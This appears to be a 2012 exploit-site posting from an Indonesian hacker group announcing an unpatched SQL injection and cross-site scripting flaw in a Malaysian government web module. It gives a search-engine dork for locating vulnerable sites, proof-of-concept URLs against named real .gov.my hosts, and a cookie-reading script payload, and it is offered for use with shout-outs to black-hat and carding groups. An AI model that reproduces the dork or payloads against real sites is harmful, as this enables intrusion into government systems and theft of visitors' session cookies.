[+] Use it at your risk,,,
[+] Made In Indonesia
---------------------------------------------------------------------------!
# Exploit Title: Ministry Malaysia XSS and SQL Injection Vulnerability
# Date: June 15 . 2012
# Author: phiA
---------------------------------------------------------------------------!
# E-mail : phia0343s@hackermail.com
# Category: [webapps] 0day
# Vendor : Ministry Malaysia [owner site]
---------------------------------------------------------------------------!
# Google dork: inurl:/modules/web/page_print.php?id=
# Security risk : Critical
# Tested on: BackTrack 5
---------------------------------------------------------------------------!
#1 Proof OF Concept SQL Injection Vulnerability
a sample from google dork !
http://www.kktpk.sarawak.gov.my/modules/web/page_print.php?id=[sqli]
#2 Proof Of Concept of XSS Vulnerability
a sample from google dork !
http://www.midcom.sarawak.gov.my/modules/web/page.php?id='"<script>alert(document.cookie)</script>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Thankz
to : Indonesian Grey Hat Team, Jakarta Anonymous Club , BlackNewbie
Team , Id-Backtrack , Indonesian Blackhat , Yogyacarderlink , HN
Community.
Greetz :
DePe , Arai Maulana , Noxtra , Sany Morphic , Vicky cyber , RadityaHN ,
X-Cisadane , Newbie Lasax , Arul Zomb , Madan Newbie , Sera Mania ,
Drevo80 ./etc
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
{QUOTE]
[+] Indonesian people here
[+] You should have eXpectED us
or you can see the mirror on http://1337day.com/exploits/18680